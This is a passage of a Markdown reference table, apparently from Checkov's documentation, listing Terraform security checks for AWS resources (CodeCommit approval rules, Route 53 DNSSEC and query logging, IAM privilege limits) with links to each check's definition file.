[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1364 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1365 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1366 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1367 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1368 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1369 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1370 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1371 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1372 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1373 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1374 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1375 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1376 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1377 | CKV2_AWS_37 | resource | 
aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1378 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1379 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1380 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1381 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1382 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1383 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1384 | 
CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1385 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1386 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1387 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1388 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1389 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1390 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1391 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1392 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1393 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1394 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1395 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1396 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1397 | 
CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1398 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1399 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1400 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1401 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1402 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1403 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1404 | 
CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1405 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1406 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1407 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1408 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1409 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1410 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1411 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1412 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1413 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1414 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1415 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1416 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1417 | CKV2_AWS_37 | 
resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1418 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1419 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1420 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1421 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1422 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1423 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1424 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1425 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1426 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1427 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1428 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1429 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1430 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1431 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1432 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1433 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1434 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1435 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1436 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1437 | CKV2_AWS_37 | 
resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1438 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1439 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1440 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1441 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1442 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1443 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1444 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1445 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1446 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1447 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1448 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1449 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1450 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1451 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1452 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1453 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1454 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1455 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1456 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1457 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1458 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | -| 1459 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | -| 1460 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1461 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1462 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | 
[IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1463 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1464 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1465 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1466 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | 